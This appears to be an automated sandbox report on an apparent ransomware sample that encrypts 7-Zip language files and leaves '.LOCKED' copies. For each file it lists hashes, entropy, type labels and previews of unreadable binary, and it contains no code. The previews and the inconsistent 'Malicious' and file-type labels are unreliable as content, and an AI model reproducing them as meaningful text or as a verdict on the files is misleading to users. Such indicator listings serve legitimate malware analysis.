                                SSDEEP:192:MZ1up68yxW6CQdqpM0NbNKpzApSv4TJv9E5dqeWGagYAXNfxl/2Mp+VOU:MZc68ys6CQdeLNbwzA8cKXqLyY+fxl+D
                                MD5:013D6B68365103BB45ED7388CA3F0E4D
                                SHA1:FABAAA92AD3B5661DC1090912300089E9FAE1990
                                SHA-256:1771FDDC4F368570E1CE42FE795EF44C9F15FF29F8CF9A64332685FCC3F6C6A3
                                SHA-512:068526E17B2AAE4EBB478514F7B6976E953C026C654508A338D184E91699E898D4FC532A97707DA7006DC609F25577BAC251C3DD99CDCE8BEB3293AA39C4208F
                                Malicious:false
                                Preview:..%:9..U....D..j.......... ...Br6.v..W8.....%..nB(...fX.. >.j<..A..T.Q....4.o}..`..CG..u..=...>6.......f.Y..D.e...Nn.K.4........[...u.!...a!.5._.H.x..Y.1...DW...y....c......u..0..}...........6.3c...)E...+j.Z...!..AV.. .m..9.'.....P..._.....!..T.LL...Zt.N.....b..iT.@..W.,.Xn..O.....S0zZ.H..s..7I..O.Q?..f....}.w\..B[....p..Ai....$.m.'6. ...).q.....u.,......1..|.+bn+u!Hob..?...@<...."".+.....%..O..a..8...R2$.j..+..Zn.t.OL_..K..u.2.A....p..U."..E...7...).AN. .S..=".S..):.+..P.f.......6.#.%.....5...9.....@0?..,%p..C....W....Uu.n..@.9.i..I..prK../.....E...:.Y..z.w.. .....Xk..u..:x.U.[..+....#Ok,.d.....kl.o.0.n|%......+......l%..[...j..n.G?....|....g....a...J.x..L.....!..............;....'F.c.cc.u..e..Yb.....;....;IK.U.......P..}.....@...A. .x..x.....c.1.3...*g.K...=.w..q}.rgw..Lxj'!....c.=.$.n...........}..n:..R....GN...i>.v.4.......N......e.)...li.G.1...&t..|.Xz>.5...d...B..8.`...K.."Q..{i~)..n0.).JKu...l.AI..M}...byC.},.c.xZe...l.,.....B.u.

                                C:\Program Files\7-Zip\Lang\it.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10358
                                Entropy (8bit):7.981210340460779
                                Encrypted:false
                                SSDEEP:192:+jI7vDGGs8sE9J/n5hkVSWh1K/wvywJlqOFJHt5HzM+VOa:/7KT8FJhaVdhE+ywF/Ht5HzM+VOa
                                MD5:C5F97328FE61AC2B6785B57205EC80DB
                                SHA1:359C674154193C267EDF5C0D42131E00A2C5783B
                                SHA-256:5CEAD15011C1665BF43902D462B16DA87997D8A997A405BBAE05738BBBCC6091
                                SHA-512:8C1C7E0563A5947E25930D52EC7AC4FFA7125195903FC115A1BD3ABB36B8AC314ADD57C6ABC4F61318191E4BCB244823966214D2334A1B9CD3D8BA4614A80243
                                Malicious:false
                                Preview:.,,"...!.E.N..h..i1>+..d..N...^...h.........g$.K.s.XV.k...=.R...E.|.......H....^....V....@......*M..A.Qo.|..C.]j..(......N..]=.<...~`[........#qx.-Q`.q.......Ffn-(....T...@...r%7.p^..-..C8\.cwY.WS......2...NG.g9..0...|*x....*.|.;u...(Q...Z...s.,.Q.&p.........9....m.'..9'.3...-.V..-....}gX.8../5.5..Do.j....i....M...maPt..;?..v.*....%?2~1W..&+....{....EC%...i..H.l....T.x....m.SQ=RdfX.h.@..6...j..^....@.i..h.p..i.9.<kyM_. 8..v.~.BfQ.K.$.B....gx?r:7..0.Z/..=M.`.Q*\Kl#F.K.5...oWM4otZH.u~..e.-^..q.....:.m.....\+@.9...t.%...q....U!V2....m.y....6[. .q...7".....aq..y...YGF}....DT;q..c.az..#......[rz..0x ....!.fg".....3K2Or.Mf..+...W.B..r.&'hyY...q....>.*Q...NSLy...)^.z.c.....c..`..t.C..9.].c.............+.j...U.t.A......<.w.G....,;..{xsw......gm....L.)3.y*.....h..]6.6..x./0..XE..:a..X...S-.)...g.izs...N.C..N....r......R..a...." ....\.....uHj...kq....`q.....W..7.#O.......-Jt.......rp.m]....4....^7.{X.......#K...u....x....T...D...+/..../o..k

                                C:\Program Files\7-Zip\Lang\it.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10358
                                Entropy (8bit):7.981210340460779
                                Encrypted:false
                                SSDEEP:192:+jI7vDGGs8sE9J/n5hkVSWh1K/wvywJlqOFJHt5HzM+VOa:/7KT8FJhaVdhE+ywF/Ht5HzM+VOa
                                MD5:C5F97328FE61AC2B6785B57205EC80DB
                                SHA1:359C674154193C267EDF5C0D42131E00A2C5783B
                                SHA-256:5CEAD15011C1665BF43902D462B16DA87997D8A997A405BBAE05738BBBCC6091
                                SHA-512:8C1C7E0563A5947E25930D52EC7AC4FFA7125195903FC115A1BD3ABB36B8AC314ADD57C6ABC4F61318191E4BCB244823966214D2334A1B9CD3D8BA4614A80243
                                Malicious:false
                                Preview:.,,"...!.E.N..h..i1>+..d..N...^...h.........g$.K.s.XV.k...=.R...E.|.......H....^....V....@......*M..A.Qo.|..C.]j..(......N..]=.<...~`[........#qx.-Q`.q.......Ffn-(....T...@...r%7.p^..-..C8\.cwY.WS......2...NG.g9..0...|*x....*.|.;u...(Q...Z...s.,.Q.&p.........9....m.'..9'.3...-.V..-....}gX.8../5.5..Do.j....i....M...maPt..;?..v.*....%?2~1W..&+....{....EC%...i..H.l....T.x....m.SQ=RdfX.h.@..6...j..^....@.i..h.p..i.9.<kyM_. 8..v.~.BfQ.K.$.B....gx?r:7..0.Z/..=M.`.Q*\Kl#F.K.5...oWM4otZH.u~..e.-^..q.....:.m.....\+@.9...t.%...q....U!V2....m.y....6[. .q...7".....aq..y...YGF}....DT;q..c.az..#......[rz..0x ....!.fg".....3K2Or.Mf..+...W.B..r.&'hyY...q....>.*Q...NSLy...)^.z.c.....c..`..t.C..9.].c.............+.j...U.t.A......<.w.G....,;..{xsw......gm....L.)3.y*.....h..]6.6..x./0..XE..:a..X...S-.)...g.izs...N.C..N....r......R..a...." ....\.....uHj...kq....`q.....W..7.#O.......-Jt.......rp.m]....4....^7.{X.......#K...u....x....T...D...+/..../o..k

                                C:\Program Files\7-Zip\Lang\ja.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):12825
                                Entropy (8bit):7.9859248602324415
                                Encrypted:false
                                SSDEEP:384:K6Q6uTKOR6FayV4RFv+YSHwHnAN5/XlmsEQ+VOx:Kd6M16VVUSHgif/HN
                                MD5:B55B46FA07238A1C0D87ED8D1C40CAE8
                                SHA1:3282BD119406D843F32B0F612302FAEB13406177
                                SHA-256:DF3240B03A8C7A50AF19608F1535A927CA6D4A6C14D2B34218A9B7BA7F655620
                                SHA-512:2711EA5A7DB61126D4ECC481F0F408821A9B52BA60817741DC5949EE0833EB489C2D60861994F4B82E708006558797855B00AE2FC02309FD8DCC4D43A618F7E2
                                Malicious:false
                                Preview:..nU(a.q......=...]t.0..:.........."c.y.n._`...L./.....&O..h.(..I.....+..G:.......*..b`f.=8...5.{.].i.. .m.Wk..<..EU......O.X71..|.'....V..yE....jw.'.z.?o}..~$f....b.....A&~.j.j...".z#y.l4....e.p..+|.SRT2i.0..M>...W.T...`...Sf.c...c..:.p..3......h..g..E........P.......:.K]vq....6v.C...T...R{..s?4.H>..x.*E..^%3.....A..8.i#j..1.....4W.)r.x.f.X%..Y........%.T.Z..9j..........y........'.yc...*.....7.B............]vQ.p.|.K.C.0...Ow#..F.:.\.G..L...K....0.....1.........k.O..f.t. 9]../{.Dd.M[.v.g.X.d.ac...-....A....e.....v..k.......k`.*.;4.W..wU....A.0...v.r..1?D..X..K*...<.......^6L......,x..6..m{...0.of..ro..3N.zX.c{4<......j.....N.5....Z...i..%..`.R.~...3.........>.2.=....pp.VV.+....\.Y.....,...$......o..Z.b.t..U.].9.e,....m.bL"..\.]&....>%w.d..Q..#[R.w."...q.:..~.-q9.4.h.CJr......AGh....z......:.L....".@...`.:.O"....p..*..^..'.L.$,G.f...v>....<..=&.......0..B....hg..f.8.].....q...Q&..).M.K.......l8..Orp..45....g-..Y... 5*.!....f.M.,f$....qb....

                                C:\Program Files\7-Zip\Lang\ja.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):12825
                                Entropy (8bit):7.9859248602324415
                                Encrypted:false
                                SSDEEP:384:K6Q6uTKOR6FayV4RFv+YSHwHnAN5/XlmsEQ+VOx:Kd6M16VVUSHgif/HN
                                MD5:B55B46FA07238A1C0D87ED8D1C40CAE8
                                SHA1:3282BD119406D843F32B0F612302FAEB13406177
                                SHA-256:DF3240B03A8C7A50AF19608F1535A927CA6D4A6C14D2B34218A9B7BA7F655620
                                SHA-512:2711EA5A7DB61126D4ECC481F0F408821A9B52BA60817741DC5949EE0833EB489C2D60861994F4B82E708006558797855B00AE2FC02309FD8DCC4D43A618F7E2
                                Malicious:false
                                Preview:..nU(a.q......=...]t.0..:.........."c.y.n._`...L./.....&O..h.(..I.....+..G:.......*..b`f.=8...5.{.].i.. .m.Wk..<..EU......O.X71..|.'....V..yE....jw.'.z.?o}..~$f....b.....A&~.j.j...".z#y.l4....e.p..+|.SRT2i.0..M>...W.T...`...Sf.c...c..:.p..3......h..g..E........P.......:.K]vq....6v.C...T...R{..s?4.H>..x.*E..^%3.....A..8.i#j..1.....4W.)r.x.f.X%..Y........%.T.Z..9j..........y........'.yc...*.....7.B............]vQ.p.|.K.C.0...Ow#..F.:.\.G..L...K....0.....1.........k.O..f.t. 9]../{.Dd.M[.v.g.X.d.ac...-....A....e.....v..k.......k`.*.;4.W..wU....A.0...v.r..1?D..X..K*...<.......^6L......,x..6..m{...0.of..ro..3N.zX.c{4<......j.....N.5....Z...i..%..`.R.~...3.........>.2.=....pp.VV.+....\.Y.....,...$......o..Z.b.t..U.].9.e,....m.bL"..\.]&....>%w.d..Q..#[R.w."...q.:..~.-q9.4.h.CJr......AGh....z......:.L....".@...`.:.O"....p..*..^..'.L.$,G.f...v>....<..=&.......0..B....hg..f.8.].....q...Q&..).M.K.......l8..Orp..45....g-..Y... 5*.!....f.M.,f$....qb....

                                C:\Program Files\7-Zip\Lang\ka.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):18811
                                Entropy (8bit):7.990457719482244
                                Encrypted:true
                                SSDEEP:384:8TEh5p/r5vLVn00nQ8I+VSNeKWi3mro/Z7SE6OO9dYjqqpw3+VOD:qEhr/rRZ0MQvtNPZmriZ7SJOgCOqpw3v
                                MD5:29317A6D6F2FE12AA164212865D33B58
                                SHA1:19D8DADE8E160945E1664941E644F42E1856DC61
                                SHA-256:19387460CB0B77758100F8D06E7280C1679D1B0F54AC8E723AA6E4D4E18BFED8
                                SHA-512:B115C916CC22D5DE5E0B685A1F6B19CEE996B915D3CBD6F69FC084072AB75763892BA23E84B68C201E23085B53CACD81ED43F3C5CF95CD3D8436DB1379C3078C
                                Malicious:true
                                Preview:.U.z........v..9'.A.Z..........N.../;).q_.....y.Z.....>..y..O.1.[u..g[.o.,j..sn...Rk.......J..i.p..}."NL.....5.[)......H&D<.E.h..=......[......2.%..V'.#..0.deh-I.J.G......]."..........R..M:......4.O. ..O5......^.......i.-..YI5...!......bXW.W;.&..cgU9.G\.FE.`...+`....y_..E.f..l*.m6.\6.z\%..U...f.L..>{..*....YP...n.dwA...A.g.o.gP...(.R...D......ry..(..UE.Is.7..a...j9O..8cv"u(..,..v..!W.b.2u..A...6q...~..T...K..J.S.MH<$..._.bW..g...'. ...I..&%.^.W....pG....;..6a-....8.9....-:.+.....nPKCs...K/.Rk..Y.*......||W..a.J)...9..C.0...L..R..G....*.3.v#.^n..L.T.8...'..X..?....A....@c.&.._........zZRu.b.&?.1..*....;...K...H...7}.... @K.$f.2.....P......P.n...O..........G..7.".{uy.\....5.C-.^q..(.5W0......]-.....Tk.....^u'.._......P.k.gD...^Cpm9v.O.......]d.*y.\z.|.... Y#eAv$...r|.&..*.......C.(Z...1}.4.s:.....c7\.UJ~.(s...[G3..i...).....U.Ak..F=@..Va.. .....o...P...1?.h...3]........>.\.O..C.z..o<..s./...Y...b..D.s.........[Q.#`...J.....d.*.F.X...V$ir)

                                C:\Program Files\7-Zip\Lang\ka.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):18811
                                Entropy (8bit):7.990457719482244
                                Encrypted:true
                                SSDEEP:384:8TEh5p/r5vLVn00nQ8I+VSNeKWi3mro/Z7SE6OO9dYjqqpw3+VOD:qEhr/rRZ0MQvtNPZmriZ7SJOgCOqpw3v
                                MD5:29317A6D6F2FE12AA164212865D33B58
                                SHA1:19D8DADE8E160945E1664941E644F42E1856DC61
                                SHA-256:19387460CB0B77758100F8D06E7280C1679D1B0F54AC8E723AA6E4D4E18BFED8
                                SHA-512:B115C916CC22D5DE5E0B685A1F6B19CEE996B915D3CBD6F69FC084072AB75763892BA23E84B68C201E23085B53CACD81ED43F3C5CF95CD3D8436DB1379C3078C
                                Malicious:true
                                Preview:.U.z........v..9'.A.Z..........N.../;).q_.....y.Z.....>..y..O.1.[u..g[.o.,j..sn...Rk.......J..i.p..}."NL.....5.[)......H&D<.E.h..=......[......2.%..V'.#..0.deh-I.J.G......]."..........R..M:......4.O. ..O5......^.......i.-..YI5...!......bXW.W;.&..cgU9.G\.FE.`...+`....y_..E.f..l*.m6.\6.z\%..U...f.L..>{..*....YP...n.dwA...A.g.o.gP...(.R...D......ry..(..UE.Is.7..a...j9O..8cv"u(..,..v..!W.b.2u..A...6q...~..T...K..J.S.MH<$..._.bW..g...'. ...I..&%.^.W....pG....;..6a-....8.9....-:.+.....nPKCs...K/.Rk..Y.*......||W..a.J)...9..C.0...L..R..G....*.3.v#.^n..L.T.8...'..X..?....A....@c.&.._........zZRu.b.&?.1..*....;...K...H...7}.... @K.$f.2.....P......P.n...O..........G..7.".{uy.\....5.C-.^q..(.5W0......]-.....Tk.....^u'.._......P.k.gD...^Cpm9v.O.......]d.*y.\z.|.... Y#eAv$...r|.&..*.......C.(Z...1}.4.s:.....c7\.UJ~.(s...[G3..i...).....U.Ak..F=@..Va.. .....o...P...1?.h...3]........>.\.O..C.z..o<..s./...Y...b..D.s.........[Q.#`...J.....d.*.F.X...V$ir)

                                C:\Program Files\7-Zip\Lang\kaa.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8710
                                Entropy (8bit):7.977084547878187
                                Encrypted:false
                                SSDEEP:192:b+jxvr7w/PmPgAddHI3c7MNTinXd6VGDjFzBYoe31q+VOW:b+jxg/uxPH1yTcdGGLW31q+VOW
                                MD5:1A21749145197C7DBCCDC5756AF1E163
                                SHA1:D905C28F0A1DA646BF0167CD941CB5F0394A493A
                                SHA-256:EC1C22E6FFFA063C2A83689C11BBB7F58F1D21BA5070756A7A1FE11F939E26B4
                                SHA-512:B3BBB75D0130856D2253CA4A506714AC374BEDEE238326172BF7282C759BA3D1F9C754B9F45124894D30C65E8A93CE71B324ED6BF1C360020A158A0B23A11806
                                Malicious:false
                                Preview:..2.D..k[......u....Z....\.0{....k~(E.....tO.........=...<X.!...!W`l.y...0.>...s...=.Xp...6s..{4....ZQ.Q9.UJv*"...;?!F.hG......t....6<.`"..S...4.~]....7.}t.........7..i$.2....[.....<.'.L|..).U9G.H...*.m...4.&..&N^(..sq .o...>5?..6.l6|.' ..iH..yL......,m........p.&.....v#.i_....q....L#.}.\.z.).......U.7,:..qHU ..&.m.ie~.....]...&HM.|........cV... .$.z..A1/.q..&\L..|NA........p|+`...2;'......O..3.Xs..&.x..."8*/.......b..l.oj. "|.+a....^.W.(....b?...`.#......:...E].QY.T........3....\S..v.\.9RE..............w.Azu...=X......@.....T..&;J...s-Uk....H.....F..bvc._.x.d.k.Dx..._'.R@......`/JB..<e..iPF].l......e...;X.i........I....9...'q........DNF.N.).3...m.p...^.<.s77......~.k.1.~D}fx.M...E......s.{.V.T/H...5l.....ou.-..O......:...n.C&.Ql.."..g.ip.'.[.!08H{.Tb.,...N.}...1+......`.....dQ.W.G..ue"o.d..n...mH......Q7er.|...q.>'..z C..F...S........8~?......6..X.Zh&1.....V|..D'c.l .o".w.......x....9.......J=!...u..R..c.....,.*..-UP.....S3j>..>[.........

                                C:\Program Files\7-Zip\Lang\kaa.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8710
                                Entropy (8bit):7.977084547878187
                                Encrypted:false
                                SSDEEP:192:b+jxvr7w/PmPgAddHI3c7MNTinXd6VGDjFzBYoe31q+VOW:b+jxg/uxPH1yTcdGGLW31q+VOW
                                MD5:1A21749145197C7DBCCDC5756AF1E163
                                SHA1:D905C28F0A1DA646BF0167CD941CB5F0394A493A
                                SHA-256:EC1C22E6FFFA063C2A83689C11BBB7F58F1D21BA5070756A7A1FE11F939E26B4
                                SHA-512:B3BBB75D0130856D2253CA4A506714AC374BEDEE238326172BF7282C759BA3D1F9C754B9F45124894D30C65E8A93CE71B324ED6BF1C360020A158A0B23A11806
                                Malicious:false
                                Preview:..2.D..k[......u....Z....\.0{....k~(E.....tO.........=...<X.!...!W`l.y...0.>...s...=.Xp...6s..{4....ZQ.Q9.UJv*"...;?!F.hG......t....6<.`"..S...4.~]....7.}t.........7..i$.2....[.....<.'.L|..).U9G.H...*.m...4.&..&N^(..sq .o...>5?..6.l6|.' ..iH..yL......,m........p.&.....v#.i_....q....L#.}.\.z.).......U.7,:..qHU ..&.m.ie~.....]...&HM.|........cV... .$.z..A1/.q..&\L..|NA........p|+`...2;'......O..3.Xs..&.x..."8*/.......b..l.oj. "|.+a....^.W.(....b?...`.#......:...E].QY.T........3....\S..v.\.9RE..............w.Azu...=X......@.....T..&;J...s-Uk....H.....F..bvc._.x.d.k.Dx..._'.R@......`/JB..<e..iPF].l......e...;X.i........I....9...'q........DNF.N.).3...m.p...^.<.s77......~.k.1.~D}fx.M...E......s.{.V.T/H...5l.....ou.-..O......:...n.C&.Ql.."..g.ip.'.[.!08H{.Tb.,...N.}...1+......`.....dQ.W.G..ue"o.d..n...mH......Q7er.|...q.>'..z C..F...S........8~?......6..X.Zh&1.....V|..D'c.l .o".w.......x....9.......J=!...u..R..c.....,.*..-UP.....S3j>..>[.........

                                C:\Program Files\7-Zip\Lang\kab.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):9197
                                Entropy (8bit):7.978323459863254
                                Encrypted:false
                                SSDEEP:192:E4RzOnZz/eE3kXVMoa/NwS779fDjC+5uCizGRelYuawcXAE+VO5:E4RzOnuW9lw2FN3iiAJcwE+VO5
                                MD5:8628A95F2872AD8CB3F8809F05AFF122
                                SHA1:406467632EE25F3328EBD376064E02784BA3FA15
                                SHA-256:B904FCC4DF8721248483794259BC60336070B5B091491455E25A57602307419A
                                SHA-512:ECA5BA21F6B9038998FA8A94DF505EF20BE562822C45C697A5484975929766603AB84A25BB70559F3364A8A91077815083D2A0488DB7556B7D4B82478903B18C
                                Malicious:false
                                Preview:.C...[.;.*]...w..P..^./...g.$..3.f.FHm..BS.G..#5.}....W.....n+4&M8.'.....9j....l.n.{....q.|...._.t.....9"...kf.)...`..:L..'b#P....F.J..S$..F.Q._W...9.Sm8`.uk.O.[3.%y.....5....M......>3.Vf....9|...r.|\.(u.]:.j..#.....L...h..q!...........M.O.......+... .....]..&|j...3b-.....(.[.Gv8.N..G..9g....$p.ko..d..c..m .8..^ *;...<u..@.Lo..Y^...9...@..LR,..F..&.X.....d..}QB/euB.....y-...f...S.2).^Hn....<o....Z....m...-^.v.."...c..o..5P...1|...W..T..4*.......a.....u...2@5[...<.>f..g....^..(jH.7.m.K....;....b.4fd.......p.W8|HH.....N..V.D<...!.S..{...h=....M.......q...4@:..E.L.S...H.cd...o..g~..'5.[..af..).+].?.@.-..2Y.s.....<~...;OgP.ba..j.^.g...)UH._.............&......@..3..~..}."-.&6.P.......*...........P.\...N]...h...%{..Y.....B..G..../...c^.M.3.QG0..1.r..+T..'KT.I.z.WY.F.R..{M..n........F.q..9..k.&u}..I.!.....(..|\.zR3 wJ.`*.7...g.VC..a>j.%..w...5.r...7A.....8...D..p.]....XH.U..Uk.n.L...S"...j....{0G...%Q!E.D....T...%..A@......'...b.fD..#.`.....

                                C:\Program Files\7-Zip\Lang\kab.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):9197
                                Entropy (8bit):7.978323459863254
                                Encrypted:false
                                SSDEEP:192:E4RzOnZz/eE3kXVMoa/NwS779fDjC+5uCizGRelYuawcXAE+VO5:E4RzOnuW9lw2FN3iiAJcwE+VO5
                                MD5:8628A95F2872AD8CB3F8809F05AFF122
                                SHA1:406467632EE25F3328EBD376064E02784BA3FA15
                                SHA-256:B904FCC4DF8721248483794259BC60336070B5B091491455E25A57602307419A
                                SHA-512:ECA5BA21F6B9038998FA8A94DF505EF20BE562822C45C697A5484975929766603AB84A25BB70559F3364A8A91077815083D2A0488DB7556B7D4B82478903B18C
                                Malicious:false
                                Preview:.C...[.;.*]...w..P..^./...g.$..3.f.FHm..BS.G..#5.}....W.....n+4&M8.'.....9j....l.n.{....q.|...._.t.....9"...kf.)...`..:L..'b#P....F.J..S$..F.Q._W...9.Sm8`.uk.O.[3.%y.....5....M......>3.Vf....9|...r.|\.(u.]:.j..#.....L...h..q!...........M.O.......+... .....]..&|j...3b-.....(.[.Gv8.N..G..9g....$p.ko..d..c..m .8..^ *;...<u..@.Lo..Y^...9...@..LR,..F..&.X.....d..}QB/euB.....y-...f...S.2).^Hn....<o....Z....m...-^.v.."...c..o..5P...1|...W..T..4*.......a.....u...2@5[...<.>f..g....^..(jH.7.m.K....;....b.4fd.......p.W8|HH.....N..V.D<...!.S..{...h=....M.......q...4@:..E.L.S...H.cd...o..g~..'5.[..af..).+].?.@.-..2Y.s.....<~...;OgP.ba..j.^.g...)UH._.............&......@..3..~..}."-.&6.P.......*...........P.\...N]...h...%{..Y.....B..G..../...c^.M.3.QG0..1.r..+T..'KT.I.z.WY.F.R..{M..n........F.q..9..k.&u}..I.!.....(..|\.zR3 wJ.`*.7...g.VC..a>j.%..w...5.r...7A.....8...D..p.]....XH.U..Uk.n.L...S"...j....{0G...%Q!E.D....T...%..A@......'...b.fD..#.`.....

                                C:\Program Files\7-Zip\Lang\kk.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11340
                                Entropy (8bit):7.9844371796270694
                                Encrypted:false
                                SSDEEP:192:v4jtGe9V7qrFHOlPAhXvlBVhStW6asIciV87Rh+7KPThikEhzc52eT+VOe:v4tGhrFHMAhflBVg9bIHVozoz4VT+VOe
                                MD5:BE6CCD0CE4A8759CC8CDAC74B9978271
                                SHA1:40E91DDC003B59229C7180AEE71CD685CB4C1F53
                                SHA-256:55ED7837DA7CCDFF0A2200C7111FE3AF87CD6102FE8C2BC72ED15D311552D796
                                SHA-512:C9581A7DDAB75C6B2CBB8FE05D0113F275A963B9E3502C1624E2200CF9F34F4A1311AAAE3EB83E7A9DBBDB190EC7DB924913A024B4353498A89F1CD85C541B6C
                                Malicious:false
                                Preview:O~....!....J..:/.._.a..3...O..8.v[._....+SY.. ......._wn).F.1m..6.BA.cot.&...ww.[n)B.?o..U....<.P..B1.K...3..).Z*:..X/..F^.q....N{T....=.Ag...m.......K.;.-Q.sy.._.....z.8.'..-.Wp...2u9b[..V_?.:.*....37..s..9..[.t..~...B...:..0.0:..D&H.=O...O=.w\.........p.~>:.0..E;[.u...B..W...w....xV_.6..\.S...i.g.......d6.x.gC...c..B.15|.02K7..xj.M..r0:......TR.r..:.-8.P#.........uK..)0..VpVy....K.8..O./.1....pJ....@.\.Z..z.u.....DED..m..........B.>n.."B6...s.C.F+v..]0N.Q.1S.L.N.....b[....V.:e...|........R%^..S..X.7Y.'Un...=.....9......r...C.........![R.C..Q..0..J....5..)...P./.w..&.lNY&"~...aIt..Lf...S.g:.[`=...{0>...y3tpU{.9.(s.....!....9H6.h..DGQ.?q.&.S....}.U.B'...1.......BS.......n?.....>....#<K.+.......}....H`#W...i..............!..K.&...E.*....X.B... [U....%q....l...HbD2......%....)..[A..J.@...n.OEHv....(...uh.y7...B..MQ..)}01.......A..@._..3..2F.L.v..'....fy....B.s...Waq*T.........5v..m...S.....3-.4.-.if6.N..<.M@.!...f.'LU..'...#..T.H.._..H..(...cNS+

                                C:\Program Files\7-Zip\Lang\kk.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11340
                                Entropy (8bit):7.9844371796270694
                                Encrypted:false
                                SSDEEP:192:v4jtGe9V7qrFHOlPAhXvlBVhStW6asIciV87Rh+7KPThikEhzc52eT+VOe:v4tGhrFHMAhflBVg9bIHVozoz4VT+VOe
                                MD5:BE6CCD0CE4A8759CC8CDAC74B9978271
                                SHA1:40E91DDC003B59229C7180AEE71CD685CB4C1F53
                                SHA-256:55ED7837DA7CCDFF0A2200C7111FE3AF87CD6102FE8C2BC72ED15D311552D796
                                SHA-512:C9581A7DDAB75C6B2CBB8FE05D0113F275A963B9E3502C1624E2200CF9F34F4A1311AAAE3EB83E7A9DBBDB190EC7DB924913A024B4353498A89F1CD85C541B6C
                                Malicious:false
                                Preview:O~....!....J..:/.._.a..3...O..8.v[._....+SY.. ......._wn).F.1m..6.BA.cot.&...ww.[n)B.?o..U....<.P..B1.K...3..).Z*:..X/..F^.q....N{T....=.Ag...m.......K.;.-Q.sy.._.....z.8.'..-.Wp...2u9b[..V_?.:.*....37..s..9..[.t..~...B...:..0.0:..D&H.=O...O=.w\.........p.~>:.0..E;[.u...B..W...w....xV_.6..\.S...i.g.......d6.x.gC...c..B.15|.02K7..xj.M..r0:......TR.r..:.-8.P#.........uK..)0..VpVy....K.8..O./.1....pJ....@.\.Z..z.u.....DED..m..........B.>n.."B6...s.C.F+v..]0N.Q.1S.L.N.....b[....V.:e...|........R%^..S..X.7Y.'Un...=.....9......r...C.........![R.C..Q..0..J....5..)...P./.w..&.lNY&"~...aIt..Lf...S.g:.[`=...{0>...y3tpU{.9.(s.....!....9H6.h..DGQ.?q.&.S....}.U.B'...1.......BS.......n?.....>....#<K.+.......}....H`#W...i..............!..K.&...E.*....X.B... [U....%q....l...HbD2......%....)..[A..J.@...n.OEHv....(...uh.y7...B..MQ..)}01.......A..@._..3..2F.L.v..'....fy....B.s...Waq*T.........5v..m...S.....3-.4.-.if6.N..<.M@.!...f.'LU..'...#..T.H.._..H..(...cNS+

                                C:\Program Files\7-Zip\Lang\ko.txt

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):10897
                                Entropy (8bit):7.981257443509297
                                Encrypted:false
                                SSDEEP:192:TscAZgofTWALMmb3b6QdmHLEPPQQVGjH1f5VweN5bEz8/HpaVKwE+VOn:TscMlTWALMmPjdmYovVxS454A/J0KwEb
                                MD5:3EDCFDB75A6C4D91DFD3A8389F9DACAD
                                SHA1:D7E4B4CDD7CB2EE71805B0F5815A9FD64FFA8094
                                SHA-256:74FECCCD84283E342AA8CE37D6373A0926606EC149DA114481A8A64103790E98
                                SHA-512:78C0334943AF00BC22236E335972FF3D7760D48E194BECAEFEF24730722896CDCF1A86E5DECAA50E7983CD3857682DC02867807CC06EA0790EE2ED04432ADE6B
                                Malicious:false
                                Preview:.y.^).....l+..og...F....mP.Q..k.V6.2.!.J...CT............bY......d...\J..Mx].1W.f/..[.Z.|q.s`Av...l........M..y7..s...s>..d..<.xE.b.i.D..K#.... Xr.H...(.......,J.c7.<A,o5..=EA..3.BX.?*.... .F..n..?S....>..T...<.....&.Q....yB.....W.....s.om...w.NY.1.......^(sX. .4H2.^S.6...].}.1..|....|...5|Yw,.Xv.....|..#bW....f.oc<.b#. .....g..`]...~..-.+.....JEZ.MF...h..S....y)).,0.L.<l.RX<...A....?.^.P#K..%.y....~.6..E..^P.Y...s.#.(X..b..KH]...`.....d...%Q.1.+..8$...9*7.oI.x.../B.......?..S0.U.....f...QfT=..L.2K]%3k.L.L..'.R....PI.`M....../.R0l..<U......#..nK#...I.'..(..|...6....l...4.'.>9.\.f.jV...1..\.Q.u....."C....'|.$..o....&n).y..UX${..x.n.T.aQ.i.4jE0..4.Z\.v..S...c.j.k....y2[..K........o^h.[..m.)).7..~U.M.f.uu.6..a".....N}.Y.mca.....Nr..o#....K..Ey.y.].u~.gk....G.....~.a...+.c.Qk:.S.:.5.G.q..Ni!.>..r_..M."...F..a...UR[z"...\..r...&y\..|.FU7.r|...|....y.`....inX?2;.J.r.v.O....%.....,..Y$L.p...K._.P.)F....h.T..7..S)....[`.a3....B..{&.C...1.bII.b..4|S.

                                C:\Program Files\7-Zip\Lang\ko.txt.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
